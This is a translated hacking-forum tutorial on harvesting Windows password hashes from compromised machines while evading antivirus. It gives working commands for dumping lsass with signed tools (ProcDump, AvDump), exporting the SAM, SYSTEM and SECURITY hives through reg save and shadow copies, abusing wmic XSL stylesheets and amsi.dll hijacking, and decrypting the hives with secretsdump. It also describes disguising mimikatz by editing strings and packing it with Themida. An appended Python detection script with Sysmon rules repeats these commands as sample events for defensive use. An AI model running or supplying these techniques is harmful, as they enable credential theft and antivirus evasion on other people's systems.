Anonymous posted on 2021-3-5 14:11:29

10001 Ways to Grab Hashes

<div style="max-width:677px !important;">
<p><strong>Preface</strong></p>
<p>When we take over a machine on the internal network, we always end up needing to grab the machine's account hashes, but in most cases the machine is running antivirus, and with AV present the server kills our beloved mimikatz the moment it lands.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/af37c0e5038d5f1afee7600f8654f811.png"></p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/2b9c21d5352f5c8025ef3c2214f2eb9a.png"></p>
<p>We need more ways to grab hashes; the common methods will not be covered in detail again here.</p>
<p><strong>.NET 4.0 execution</strong></p>
<p>Download the xml file.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/4f0615c49af280507e5985676a2bfefd.png"></p>
<p><strong>JS loading</strong></p>
<pre><code>cscript mimikatz.js</code></pre>
<p>It is already recognised by some sensitive AV products; we can bypass that through DLL hijacking. In Process Monitor you can see the process calling C:\Windows\System32\amsi.dll.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/97092800c75d313ce53ce1108a737ff1.png"></p>
<p>We can simply DLL-hijack it.</p>
<pre><code>copy c:\windows\system32\cscript amsi.dll
asmi.dll 11.js</code></pre>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/0e745733ba96655f3b363ca516e9baad.png"></p>
<p>For how to generate the js version of mimikatz, see the description below.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/44f00d72ee46996aba3aaaa96ddbb9a8.png"></p>
<p>Here csc was used to generate a base64-encoded version, and JavaScript then launches mimikatz from memory.</p>
<p><strong>wmic invocation</strong></p>
<pre><code>Local: wmic process list /FORMAT:evil.xsl</code></pre>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/1d42a9a5a3d6ad1fcd8340d82c6521ae.png"></p>
<pre><code>Remote:
wmic os get /FORMAT:"</code></pre>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/271d4e4a726ded996f96c960619a24e4.png"></p>
<p><strong>Internal Monologue Attack</strong></p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/0f2058f006638d2b268dd087f75820ab.png"></p>
<p><strong>Bypass</strong></p>
<p>Some AV products are aggressive enough to kill all of these; we can get around them in several ways: dump LSASS, read the system files, build a freshly bypassed mimikatz, and so on.</p>
<p><strong>Procdump</strong></p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/a3732dabde66c55abff599fedd214784.png"></p>
<p>Official description: ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring and unhandled exception monitoring, and it can generate dumps based on the values of system performance counters. It can also serve as a general process dump utility.</p>
<p>Everyone knows Procdump; because it carries Microsoft's official signature, we can use it to get past some mediocre AV and dump the credentials held by lsass.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/31e72c34deb94428e073380face92bf7.png"></p>
<p>Run the following command:</p>
<pre><code>Procdump.exe -accepteula -ma lsass.exe lsass.dmp</code></pre>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/1a3605e94a893463b942d59eaff0f144.png"></p>
<p>Run mimikatz on our own machine against the dump and the passwords can be viewed successfully.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/46ea2ea035ba53382005a3f145237e77.png"></p>
<p><strong>Avdump</strong></p>
<p>Avdump.exe is a small tool shipped with the Avast HomeSecurity product suite. As the name suggests, the utility dumps the memory of a given process identifier to a location specified by the user. We can use it as a new way of dumping.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/95df0b2ac6a0bc05b55c26fcb9c54410.png"></p>
<p>It carries the Avast AV vendor's own trusted (whitelisted) signature.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/639521b57a786b3de3ed32f4a32a3c31.png"></p>
<p>We just run it directly.</p>
<pre><code>.\AvDump.exe --pid 696 --exception_ptr 0 --dump_level 1 --thread_id 0 --min_interval 0 --dump_file e:\tmp\last.dmp</code></pre>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/b7c3dd919da4c1bd67a24c605d93b127.png"></p>
<p>Run mimikatz on our own machine against the dump and the passwords can be viewed successfully.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/2f7deefcd8e9166c3b2c969c6b240059.png"></p>
<p><strong>Decrypting the SAM</strong></p>
<p>Some aggressive EDRs block dumping the lsass process via Procdump, MiniDump and similar methods; we can switch to a different approach.</p>
<p>SAM is the Security Account Manager. It stores users and their hashes and is used to authenticate local and remote users.</p>
<p>To decrypt the hashes we need three files: SAM, SYSTEM and SECURITY. As long as we have these three files we can read them.</p>
<p><strong>Registry copy</strong></p>
<p>REG SAVE saves a copy of the specified subkeys, entries and registry values to a file; just save them and you are done.</p>
<pre><code>reg save hklm\system SYSTEM
reg save hklm\sam SAM
reg save hklm\security SECURITY</code></pre>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/5487fee5fb61d552eecda70147cdc9d6.png"></p>
<p><strong>Volume shadow copy</strong></p>
<p>Read the three files by copying them out of a shadow copy volume.</p>
<p>First create a shadow copy of the C: drive:</p>
<pre><code>wmic shadowcopy call create volume='c:\'</code></pre>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/f69829c1247e85ff51b6e3f1d982a2e8.png"></p>
<p>List the shadow copies, pick the shadow copy volume, and copy the three files we need:</p>
<pre><code>vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\sam .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\security .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\system .</code></pre>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/378a8bd4d6c7aec6b85f1af60c07ecb7.png"></p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/4ba8dd3fb99756c1b391b4cbf3dc5d51.png"></p>
<p><strong>Decrypting and recovering the hashes</strong></p>
<p>Once we have the three files from any of the methods above, we use impacket-secretsdump to decrypt them:</p>
<pre><code>impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL</code></pre>
<p>Then just crack the resulting hashes directly.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/2a209ef630a38e56cef328cadb71509f.png"></p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/98c91955a0e2c0ff4bf197288e2f8058.png"></p>
<p><strong>mimikatz AV evasion</strong></p>
<p>Beyond that, we can also make mimikatz itself evade AV.</p>
<p>The usual approach is to remove the MIMIKATZ signatures at the code level and the default resources such as the ICO icon, and to replace the contents of the bin packages.</p>
<p>Obfuscate the compiled program (packing), clone a signature, and so on.</p>
<p>Replace or delete sensitive strings / change the ico icon:</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/d443f84778de85c93c80420625d335b1.png"></p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/d9440f3ac7dc468f33ccdcd5cac7cb04.png"></p>
<p>Modify the rc signatures.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/11c35c0a187a87843b2fc43fb99bd675.png"></p>
<p>Use a hex editor to find some sensitive DLL and function names such as wdigest.dll and isbase64interceptinput and replace them.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/0e06e10c8b01e43fa8b52811f3771eb1.png"></p>
<p>Point the methods in the sensitive bin files at methods from DLLs that ship with the system.</p>
<p>netapi32</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/3854a0aed77401a33c5bdbe12010a3a6.png"></p>
<p>The netapi32.dll file on the system:</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/8c61a999ac57759c6b8d9cf7e7bdeec6.png"></p>
<p>Create the bin file and point its methods at system functions.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/14734e048cc6c87e7c6cf21fb82d3c6a.png"></p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/b5525acd559b2e7180b071094eabb258.png"></p>
<p>Finally pack it with Themida and run it.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/6a6832dd38fb8c770673068d4d2dbc12.png"></p>
<p>It runs successfully with no alert.</p>
<p><img src="https://www.ihonker.org/data/attachment/forum/202103/05/add04a9a8442a19f9cfb567c1bb84c2e.png"></p>
<p><strong>Summary</strong></p>
<p>As AV detection and behaviour-based signature scanning keep improving, exploitation gets harder and harder; we too must keep raising our skill level and learn better techniques for red/blue confrontation.</p>
</div>
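<p>Added detection example for this page, not code from the original post: it runs Sysmon-style rules over constructed process-creation (Event ID 1) and process-access (Event ID 10) records covering the commands shown above (ProcDump and AvDump against lsass, reg save of the SAM/SYSTEM/SECURITY hives, shadow-copy creation and hive copy, wmic /FORMAT: stylesheets, and a script host run from outside System32). Field names follow Sysmon's schema; the sample records, paths and the lsass allowlist are constructed and would need tuning per environment.</p>

```python
"""Detection rules for the LSASS-dump and SAM-extraction commands on this
page, run over constructed Sysmon-style events (no live system needed)."""
import re
from typing import Dict, List, Tuple

# Process-creation (Sysmon Event ID 1) rules: name -> case-insensitive regex
# applied to CommandLine. Each one mirrors a command from the post.
COMMANDLINE_RULES: Dict[str, re.Pattern] = {
    "lsass_dump_procdump": re.compile(r"procdump\S*\s.*\blsass\b", re.I),
    "registry_hive_export": re.compile(
        r"\breg(?:\.exe)?\s+save\s+[\"']?hklm\\(?:sam|system|security)\b", re.I),
    "shadow_copy_create": re.compile(
        r"wmic\s+shadowcopy\s+call\s+create|vssadmin\S*\s+create\s+shadow", re.I),
    "hive_copy_from_shadow": re.compile(
        r"harddiskvolumeshadowcopy\d+\\windows\\system32\\config\\"
        r"(?:sam|system|security)\b", re.I),
    # Legitimate /FORMAT: values are built-in names (csv, list, htable ...);
    # an .xsl file or a URL means a stylesheet script is being executed.
    "wmic_xsl_stylesheet": re.compile(
        r"wmic\b.*/format:\s*[\"']?(?:https?://|\S*\.xsl)", re.I),
}

SYSTEM_DIR = "c:\\windows\\"
SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")

# Process-access (Sysmon Event ID 10) rule: a handle to lsass.exe that
# includes PROCESS_VM_READ from a source outside a small allowlist.
PROCESS_VM_READ = 0x0010
LSASS_ACCESS_ALLOWLIST = {  # constructed; tune per environment
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
}

# Constructed sample events (values are made up for this example).
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Tools\Procdump.exe",
     "CommandLine": r"Procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam SAM"},
    {"EventID": 1, "Image": WMIC,
     "CommandLine": r"wmic shadowcopy call create volume='c:\'"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4"
                    r"\Windows\system32\config\sam ."},
    {"EventID": 1, "Image": WMIC,
     "CommandLine": r"wmic process list /FORMAT:evil.xsl"},
    {"EventID": 1, "Image": WMIC,
     "CommandLine": r'wmic os get /FORMAT:"https://example.invalid/evil.xsl"'},
    # cscript.exe copied out of System32 so a side-loaded amsi.dll is found.
    {"EventID": 1, "Image": r"C:\Users\Public\cscript.exe",
     "CommandLine": r"cscript.exe 11.js"},
    # AvDump's command line says nothing about lsass; only the handle-access
    # rule below catches it.
    {"EventID": 1, "Image": r"C:\Program Files\Avast Software\Avast\AvDump.exe",
     "CommandLine": r".\AvDump.exe --pid 696 --exception_ptr 0 --dump_level 1 "
                    r"--thread_id 0 --min_interval 0 --dump_file e:\tmp\last.dmp"},
    {"EventID": 10, "SourceImage": r"C:\Tools\Procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Avast Software\Avast\AvDump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query hklm\software\microsoft\windows\currentversion"},
]


def _image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(event: Dict[str, object]) -> List[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits: List[str] = []
    eid = event.get("EventID")
    if eid == 1:
        cmd = str(event.get("CommandLine", ""))
        hits.extend(name for name, pat in COMMANDLINE_RULES.items() if pat.search(cmd))
        image = str(event.get("Image", ""))
        if _image_name(image) in SCRIPT_HOSTS and not image.lower().startswith(SYSTEM_DIR):
            hits.append("script_host_outside_system_dir")
    elif eid == 10:
        target = _image_name(str(event.get("TargetImage", "")))
        source = str(event.get("SourceImage", "")).lower()
        access = int(str(event.get("GrantedAccess", "0")), 16)
        if target == "lsass.exe" and access & PROCESS_VM_READ \
                and source not in LSASS_ACCESS_ALLOWLIST:
            hits.append("lsass_memory_read")
    return hits


def scan_events(events: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every hit, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify_event(ev)]


if __name__ == "__main__":
    for idx, rule in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The command-line rules are signature-style and stop matching as soon as a binary is renamed or its arguments are rewritten, which is why the Event ID 10 rule keys on the lsass handle itself rather than on any tool name.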